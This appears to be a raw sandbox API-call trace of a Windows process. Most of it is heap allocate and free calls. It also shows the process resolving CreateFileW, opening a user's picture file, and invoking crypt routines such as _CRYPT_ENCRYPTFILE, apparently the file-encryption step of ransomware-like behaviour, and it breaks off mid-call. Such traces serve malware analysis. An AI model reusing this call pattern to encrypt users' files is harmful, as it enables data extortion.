lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0089.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0089.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0089.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0089.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0089.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0089.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0089.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0089.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0089.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0089.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0089.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0089.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0089.697] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0089.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0089.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0089.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0089.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca250, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0089.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0089.698] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0089.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0089.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0089.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0089.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0089.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0089.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0089.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0089.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0089.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0089.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0089.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0089.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0089.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0089.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0089.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0089.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0089.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0089.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0089.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0089.699] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\qBLfci.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\qblfci.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0089.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0089.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0089.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0089.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0089.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0089.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0089.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0089.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0089.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0089.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0089.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0089.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0089.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0089.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0089.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0089.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0089.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0089.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0089.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0089.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0089.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0089.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0089.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0089.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0089.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0089.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0089.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0089.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0089.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0089.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0089.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0089.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0089.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0089.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0089.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0089.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0089.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0089.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0089.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0089.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0089.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0089.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0089.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0089.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0089.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0089.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0089.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0089.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0089.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0089.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0089.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0089.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0089.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0089.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0089.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0089.701] FreeLibrary (hLibModule=0x772d0000) returned 1 [0089.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0089.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0089.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0089.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0089.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0089.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0089.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0089.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0089.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0089.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0089.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0089.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0089.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0089.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0089.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0089.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0089.703] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0089.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0089.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0089.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0089.703] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0089.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0089.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0089.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0089.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0089.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0089.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0089.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0089.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0089.704] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0089.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0089.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0089.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0089.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0089.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0089.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0089.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0089.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0089.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0089.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0089.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0089.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0089.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0089.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0089.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0089.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0089.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0089.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0089.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0089.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0089.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0089.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0089.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0089.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0089.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0089.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0089.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0089.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0089.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0089.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0089.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0089.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0089.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0089.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0089.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0089.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0089.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0089.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0089.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0089.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0089.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0089.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0089.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0089.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0089.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0089.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0089.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0089.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0089.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0089.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0089.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0089.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0089.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0089.706] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9e00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0089.707] CloseHandle (hObject=0x258) returned 1 [0089.707] FreeLibrary (hLibModule=0x772d0000) returned 1 [0089.707] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0089.707] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\qBLfci.gif", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22963900, ftCreationTime.dwHighDateTime=0x1d5eadd, ftLastAccessTime.dwLowDateTime=0x64985a50, ftLastAccessTime.dwHighDateTime=0x1d5eb68, ftLastWriteTime.dwLowDateTime=0x64985a50, ftLastWriteTime.dwHighDateTime=0x1d5eb68, nFileSizeHigh=0x0, nFileSizeLow=0x3a40, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="qBLfci.gif", cAlternateFileName="")) returned 0x41ac600 [0089.707] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0089.708] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0089.708] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0089.708] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0089.708] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.708] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0089.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797008, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0089.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, 